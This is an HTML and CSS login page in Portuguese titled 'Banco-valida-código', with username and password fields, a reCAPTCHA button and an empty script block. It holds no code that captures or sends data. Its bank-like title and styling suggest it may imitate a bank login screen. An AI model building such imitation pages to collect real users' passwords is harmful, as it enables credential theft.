<!doctype html>
<html lang="pt-br">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
<title>Banco-valida-código</title>
<style>
*
{
	margin: 0;
	padding: 0;
}
body
{
	font-family: Rubik, Arial, sans-serif;
	font-size: 16px;
	overflow: hidden;
}
.bl-conteudo
{
	height: 50vh;
	background-color: rgb(230, 230, 230);
	display:flex;
	justify-content: end;
	align-items: end;
}
/*.bl-caixa-de-info
{
	background-color: #FFF;
	height: 340px;
	width: 380px;
	margin: 0 auto;
    margin-top: 0px;
	margin-top: -25vh;
	border-radius: 15px;
	padding: 40px;
}*/
.bl-caixa-de-info
{
	background-color: #FFF;
	height: 340px;
	width: 380px;
	border-radius: 15px;
	padding: 40px;
	position: absolute;
	top: 50vh;
	left: 50vw;
	z-index: 100;
	transform: translate(-50%,-50%);
	-ms-transform: translate(-50%,-50%);
}
.bl-politica-de-privacidade
{
	font-size: 12px;
	margin-top: 60px;
}
.bl-politica-de-privacidade a
{
	color: #49b5e3;
	text-decoration: none;
}
.bl-retangulo-azul
{
    width: 100%;
	background-color: #00b1ea;
	height: 50vh;
}
.bl-codigo-campo
{
	height: 35px;
	width: 358px;
	border: 1px solid #00b1ea;
	border-radius: 15px;
	padding: 5px 10px;
	font-size: 18px;
	margin-bottom: 10px;
}
.bl-botao-azul
{
	height: 47px;
	width: 380px;
	background-color: #009ee3;
	color: #FFF;
	font-size: 16px;
	border: none;
	border-radius: 15px;
}
.bl-espacamento-campos
{
	padding-bottom: 20px;
	display: block;
}
.bl-espacamento
{
	display:flex;
	justify-content: center;
	padding-bottom: 20px;
}
.bl-espacamento-texto
{
	padding-top: 20px;
}
.bl-espacamento-campos label
{
	font-size: 12px;
	font-weight: 600;
	padding-bottom: 10px;
}
.bl-espacamento-campos label, input
{
	display: block;
}
.bl-espacamento_links
{
	display: flex;
	color: #49b5e3;
	justify-content: space-evenly;
}
.bl-espacamento_links a
{
	color: #49b5e3;
	text-decoration: none;
}
@media (max-width: 600px)
{
    .bl-caixa-de-info
    {
    	padding: 20px;
    	width: 350px;
    }
    .bl-codigo-campo
    {
    	height: 35px;
    	width: 90%;
    }
}
</style>
</head>

<body>
	<div class="bl-retangulo-azul">
    </div>
    <div class="bl-conteudo">
        <div class="bl-caixa-de-info">
        <h3>Olá! Para continuar digite o seu telefone, e-mail ou usuário</h3>
			<div class="bl-espacamento-texto">
				<form id="form1" name="form1" method="post" enctype="application/x-www-form-urlencoded">
					<div class="bl-espacamento-campos">
						<div class="bl-bloco">
						<label for="identificacao">Telefone, e-mail ou usuário</label>
						<input type="text" class="bl-codigo-campo" maxlength="50" id="identificacao" placeholder="example@email.com"/>
						</div>
						<div class="bl-bloco">
						<label for="senha">Senha</label>
						<input type="password" class="bl-codigo-campo" maxlength="50" id="senha"/>
						</div>
					</div>
					<div class="bl-espacamento">
						<input type="submit" id="entrar" value="Entrar" class="bl-botao-azul" />
					</div>
					 <div class="bl-espacamento_links">
						<a href="#" title="Criar Conta">Criar Conta</a>
						<a href="#" title="Perdi a Senha">Perdi a Senha</a>
					</div>
				</form>
				<div class="bl-politica-de-privacidade">
					<span>Protegido po reCAPTCHA -<a href="https://policies.google.com/privacy" title="Privacidade"> Privacidade</a> - <a href="https://policies.google.com/terms" title="Condições"> Condições</a></span>
				</div>
			</div>
			<script type="text/javascript">
			
			</script>
        </div>
		<script>
		function onSubmit(token) 
		{
			document.getElementById("form1").submit();
		}
		</script>
		<button class="g-recaptcha bl-ajusta-captcha" data-sitekey="6LfHp-8cAAAAALO7SQTPIj7kXJVWXrkbr3qb_8ve" data-callback='onSubmit' data-action='submit'>
		</button>
    </div>
</body>
</html>
